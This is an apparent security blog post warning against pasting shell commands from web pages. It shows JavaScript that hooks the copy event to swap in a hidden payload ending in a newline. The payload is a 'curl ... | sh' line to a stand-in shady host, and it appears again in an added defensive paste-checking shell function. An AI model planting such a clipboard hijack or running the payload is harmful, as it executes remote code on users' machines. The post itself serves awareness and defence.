Don't Copy Paste into terminal

Other Oct 24, 2020

When you see a shell command on the Internet, do not copy it straight into your terminal.

The browser's Clipboard API lets a page hook the `copy` event and replace the text being copied with whatever it likes, so what lands on your clipboard need not be what you selected.

Here is how simple the attack can be. On the original page, the command below is the element the script hooks: select and copy it, and what lands on the clipboard is not what you see.

$ echo "looks safe to me!"

Note that you don't even have to press Enter after pasting for the command to run: the payload ends with a newline, and an interactive shell treats that newline as Enter for you.

Here is the JavaScript that performs the substitution.

// Hook the copy event on the element that displays the "safe" command
// (an element with id="copyme" on the page).
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Replace the selected text with the attacker's payload. The trailing
    // newline makes the shell execute it as soon as it is pasted.
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    // Stop the browser from also writing the real selection to the clipboard.
    e.preventDefault();
});
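As an added example (not part of the original post), here is a small POSIX shell function that inspects text before you paste it into a terminal. The heuristics it applies (trailing newline, more than one line, control characters, a download piped into a shell) and the clipboard commands named in the header comment are my choices, not the post's; the two inputs in the demo at the bottom are constructed from the command the post shows and the payload its script writes.

```sh
#!/bin/sh
# Added example, not from the original post: inspect text BEFORE pasting it
# into a shell. Feed the clipboard through check_paste and paste only if it
# reports nothing. Returns 0 when clean, 1 when something looks dangerous.
#   macOS:          pbpaste | check_paste
#   Linux/X11:      xclip -o -selection clipboard | check_paste
#   Linux/Wayland:  wl-paste | check_paste

check_paste() {
    tmp=$(mktemp) || return 2
    cat > "$tmp"            # buffer stdin so it can be scanned more than once
    status=0

    # 1. Trailing newline: an interactive shell runs the line the instant it
    #    is pasted, so you never get a chance to read it.
    last=$(tail -c 1 "$tmp" | od -A n -t x1 | tr -d ' \n')
    if [ "$last" = "0a" ]; then
        echo "WARN: ends with a newline; it would execute on paste"
        status=1
    fi

    # 2. More than one line when you expected to paste a single command.
    if [ "$(grep -c '' "$tmp")" -gt 1 ]; then
        echo "WARN: contains multiple lines"
        status=1
    fi

    # 3. Control characters (ESC sequences that hide text, CR, NUL, ...).
    #    grep works line by line, so the newline itself never matches here.
    if LC_ALL=C grep -q '[[:cntrl:]]' "$tmp"; then
        echo "WARN: contains control characters (shown with cat -v):"
        cat -v "$tmp"
        status=1
    fi

    # 4. The download-and-execute idiom the post warns about (heuristic:
    #    curl/wget piped, possibly via sudo, into sh/bash/zsh/dash).
    if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([^[:alnum:]_]|$)' "$tmp"; then
        echo "WARN: pipes a download straight into a shell"
        status=1
    fi

    rm -f "$tmp"
    return "$status"
}

# Demo on constructed input: the command the post displays, then the one
# its script actually puts on the clipboard.
if printf 'echo "looks safe to me!"' | check_paste; then
    echo "clean: safe to paste"
fi
if ! printf 'echo "this could have been [curl http://myShadySite.com | sh]"\n' | check_paste; then
    echo "refusing: review before pasting"
fi
```

The trailing-newline trick is also blunted by bracketed paste, which bash 5.1+ and zsh turn on by default when the terminal emulator supports it: pasted text, newlines included, is inserted into the current line instead of being executed. That does nothing about a substituted command, so still read what actually landed before pressing Enter.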

Sources:
https://briantracy.xyz/writing/copy-paste-shell.html

Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325
